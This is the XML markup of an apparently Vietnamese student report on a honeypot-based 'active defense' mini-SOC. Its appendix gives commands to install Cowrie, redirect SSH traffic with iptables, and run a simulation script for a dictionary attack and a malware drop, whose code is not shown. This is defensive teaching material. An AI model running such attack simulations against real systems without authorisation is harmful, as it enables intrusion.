          </w:tcPr>
          <w:p w14:paraId="3914D4A1"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sudo apt-get update &amp;&amp; sudo apt-get install -y git python3-pip python3-virtualenv iptables</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>git clone https://github.com/cowrie/cowrie.git</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>cd cowrie</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>virtualenv --python=python3 cowrie-env</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>source cowrie-env/bin/activate</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>pip install --upgrade pip &amp;&amp; pip install -r requirements.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>bin/cowrie start</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5126DDD6"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Lệnh cài đặt và khởi động Cowrie Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B19342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2: Chuyển hướng lưu lượng mạng SSH từ cổng 22 sang cổng bẫy 2222:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af7"/>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06F55B86" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70F1CA93"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sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>sudo iptables-save &gt; /etc/iptables/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>rules.v</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DC4C95F"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Cấu hình chuyển hướng cổng trên iptables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E030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3: Khởi động Hệ sinh thái Active Defense &amp; Telegram SOAR Orchestrator:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af8"/>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3A3B0A13" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0475E767"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cd /path/to/soc-honeynet-active-defense</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>python3 -m pip install -r requirements.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>python3 main.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05FE4276"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Khởi chạy bộ điều phối trung tâm Mini-SOC Active Defense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06486E41"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Phụ lục B: Kịch bản Kiểm thử Diễn tập Red Team Tự động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BA6EB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thực hiện bài kiểm tra diễn tập tự động chứng minh với Hội đồng Đánh giá, chạy kịch bản mô phỏng tấn công từ điển và thả mã độc:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af9"/>
        <w:tblW w:w="9403"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403"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="4E82A9C8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4236E1D6"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Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>python3 scripts/simulate_attack.py</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>python3 scripts/test_pipeline.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05B82BBC" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lệnh thực thi diễn tập kiểm thử toàn diện các kịch bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0572891E" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="003C5386">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="340"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003C5386" w:rsidRPr="005B486F">
      <w:footerReference w:type="default" r:id="rId22"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1701" w:header="340" w:footer="340" w:gutter="0"/>
      <w:cols w:space="720"/>
      <w:titlePg/>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D91D0" w14:textId="77777777" w:rsidR="00B6502D" w:rsidRDefault="00B6502D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4F8D4105" w14:textId="77777777" w:rsidR="00B6502D" w:rsidRDefault="00B650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8D1F4D1-7AAB-443E-975B-9D126FFBEFF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embedRegular r:id="rId2" w:fontKey="{E708E8E2-83A0-43CD-8907-63F55A9E5170}"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:embedRegular r:id="rId3" w:fontKey="{1777894D-9787-43A2-AD2D-9B179D0784C0}"/>
    <w:embedItalic r:id="rId4" w:fontKey="{2C814F0C-2014-41D9-BDF3-588CD51030D3}"/>
  </w:font>
  <w:font w:name="Segoe UI">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000E47F" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
    <w:embedRegular r:id="rId5" w:fontKey="{A668D405-DB0D-4559-B17B-7FE842827F0F}"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00006FF" w:usb1="420024FF" w:usb2="02000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId6" w:fontKey="{C4C617BD-7456-474B-808D-A8A647D293EC}"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId7" w:fontKey="{C47A0652-B316-4B14-AC9F-905C980520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E31A2" w14:textId="77777777" w:rsidR="003C5386" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
        <w:tab w:val="left" w:pos="1470"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="00000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0967" w14:textId="77777777" w:rsidR="003C5386" w:rsidRDefault="00000000">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="284"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="005B486F">
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs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60700" w14:textId="77777777" w:rsidR="00B6502D" w:rsidRDefault="00B6502D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="012E42C5" w14:textId="77777777" w:rsidR="00B6502D" w:rsidRDefault="00B650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759C" w14:textId="77777777" w:rsidR="003C5386" w:rsidRDefault="003C53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44DBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12CA4EF6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-Bulle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30152409">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="6125889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20501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18922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917737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4071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406049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06260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386"/>
    <w:rsid w:val="003C5386"/>
    <w:rsid w:val="00405EFD"/>
    <w:rsid w:val="005B486F"/>
    <w:rsid w:val="00B65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FE64"/>
  <w15:docId w15:val="{C4AD59C4-C6E2-404E-BB80-90D1870A5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US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing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b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>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Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="1F3863"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="116" w:hanging="864"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="260" w:hanging="1008"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="404" w:hanging="1152"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>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0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>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60036E"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0"/>
      <w:ind w:firstLine="454"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="26"/>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60036E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-Number">
    <w:name w:val="CTDT-Number"/>
    <w:basedOn w:val="CTDT-Bullet1"/>
    <w:link w:val="CTDT-NumberChar"/>
    <w:qFormat/>
    <w:rsid w:val="00260AB5"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="720"/>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0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="720"/>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tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:after="360" w:line="264" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="720"/>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tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:after="0"/>
      <w:ind w:left="720" w:hanging="720"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:caps w:val="0"/>
      <w:sz w:val="28"/>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A0090A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:line="288" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="720"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:sz w:val="26"/>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tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="720"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-H3Char">
    <w:name w:val="CTDT-H3 Char"/>
    <w:basedOn w:val="CTDT-H2Char"/>
    <w:link w:val="CTDT-H3"/>
    <w:rsid w:val="00A0090A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:i/>
      <w:caps w:val="0"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-H0">
    <w:name w:val="CTDT-H0"/>
    <w:basedOn w:val="CTDT-H1"/>
    <w:link w:val="CTDT-H0Char"/>
    <w:qFormat/>
    <w:rsid w:val="00EB06E2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:r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spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-H31">
    <w:name w:val="CTDT-H3.1"/>
    <w:basedOn w:val="CTDT-H3"/>
    <w:link w:val="CTDT-H31Char"/>
    <w:qFormat/>
    <w:rsid w:val="00325061"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:before="240"/>
      <w:ind w:left="720" w:hanging="72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paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>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0">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1">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2">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="140" w:type="dxa"/>
        <w:left w:w="180" w:type="dxa"/>
        <w:bottom w:w="140" w:type="dxa"/>
        <w:right w:w="180" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a3">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4">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5">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6">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7">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8">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="140" w:type="dxa"/>
        <w:left w:w="180" w:type="dxa"/>
        <w:bottom w:w="140" w:type="dxa"/>
        <w:right w:w="180" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a9">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a">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b">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c">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d">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e">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0">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1">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2">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f3">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f4">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f5">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="140" w:type="dxa"/>
        <w:left w:w="180" w:type="dxa"/>
        <w:bottom w:w="140" w:type="dxa"/>
        <w:right w:w="180" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="af6">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7">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8">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9">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="140" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="14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88ic1IpXDyPYihazUekv0kC0ZQ==">CgMxLjA4AHIhMWNkNnFqNXp0dEVnR29hbV9WUHpoOVpUVU9VdGt1SUZY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12045</Words>
  <Characters>68660</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>572</Lines>
  <Paragraphs>161</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>80544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Dau Hoang</dc:creator>
  <cp:lastModifiedBy>Nguyen Gia Hao D24AT02</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-12T01:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-18T04:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>